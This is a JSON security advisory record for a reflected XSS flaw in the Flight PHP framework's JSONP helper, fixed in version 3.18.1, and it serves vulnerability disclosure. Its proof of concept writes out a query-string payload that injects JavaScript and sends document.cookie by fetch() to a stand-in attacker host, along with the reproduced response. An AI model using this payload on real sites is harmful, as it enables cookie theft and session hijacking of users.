{"id":"GHSA-fcx8-ph5r-mxr4","summary":"Flight has reflected XSS through an unvalidated JSONP callback in Flight::jsonp() ","details":"### Summary\n`Flight::jsonp()` concatenates the `?jsonp=` query parameter directly into an `application/javascript` response body without validating that the value is a legal JavaScript identifier. An attacker can inject arbitrary JavaScript that executes in the response origin, enabling reflected cross-site scripting.\n\n### Affected code\n`flight/Engine.php` (≈ lines 1000-1013):\n\n```php\n$callback = $this-\u003erequest()-\u003equery[$param];\n$this-\u003eresponse()\n    -\u003estatus($code)\n    -\u003eheader('Content-Type', 'application/javascript; charset=' . $charset)\n    -\u003ewrite($callback . '(' . $json . ');');\n```\n\nNo regex or identifier validation is performed before the callback is written.\n\n### Proof of concept\nGiven any route that calls `Flight::jsonp($data)`:\n\n```\nGET /api?jsonp=;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//\n```\n\nReproduced response (`Content-Type: application/javascript`):\n\n```\n;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//({\"ok\":true,\"msg\":\"hello\"});\n```\n\nWhen the vulnerable endpoint is loaded via `\u003cscript src=\"https://victim.tld/api?jsonp=…\"\u003e` on a page controlled by the attacker, the injected JavaScript executes in the `victim.tld` origin whenever that page is embedded or visited in a same-origin context — cookie theft and session hijack follow.\n\n### Impact\n- Reflected XSS in any application calling `Flight::jsonp()`.\n- Cookie theft / session hijack when JSONP endpoints are referenced from same-origin pages.\n- Exfiltration of authenticated API responses.\n\n### Patch (fixed in `3.18.1`, commit `b8dd23a`)\n`_jsonp()` now validates the callback name against `^[A-Za-z_$][\\w$.]{0,127}$` before emitting it. An empty callback (no `jsonp` parameter) still behaves as before.\n\n### Credit\nDiscovered by **@Rootingg**.","aliases":["CVE-2026-42548"],"modified":"2026-05-06T21:57:55.336006Z","published":"2026-05-06T21:34:15Z","database_specific":{"cwe_ids":["CWE-79"],"github_reviewed":true,"github_reviewed_at":"2026-05-06T21:34:15Z","severity":"HIGH","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/flightphp/core/security/advisories/GHSA-fcx8-ph5r-mxr4"},{"type":"PACKAGE","url":"https://github.com/flightphp/core"}],"affected":[{"package":{"name":"flightphp/core","ecosystem":"Packagist","purl":"pkg:composer/flightphp/core"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"3.18.1"}]}],"versions":["v1.0","v1.1","v1.1.10","v1.1.5","v1.2","v1.2.13","v1.2.14","v1.2.15","v1.2.17","v1.2.18","v1.2.19","v1.2.20","v1.2.21","v1.2.22","v1.3.0","v1.3.1","v1.3.2","v1.3.3","v1.3.4","v1.3.5","v1.3.7","v1.3.8","v1.3.9","v2.0.0","v2.0.1","v3.0.0","v3.0.1","v3.0.2","v3.1.0","v3.1.1","v3.10.0","v3.10.1","v3.11.0","v3.11.1","v3.12.0","v3.13.0","v3.13.1","v3.14.0","v3.15.0","v3.15.1","v3.15.2","v3.15.3","v3.16.0","v3.16.1","v3.17.0","v3.17.1","v3.17.2","v3.17.3","v3.17.4","v3.18.0","v3.2.0","v3.3.0","v3.4.0","v3.4.1","v3.4.2","v3.5.0","v3.5.2","v3.5.3","v3.6.0","v3.6.1","v3.6.2","v3.7.0","v3.7.1","v3.7.2","v3.8.0","v3.8.1","v3.9.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fcx8-ph5r-mxr4/GHSA-fcx8-ph5r-mxr4.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N"}]}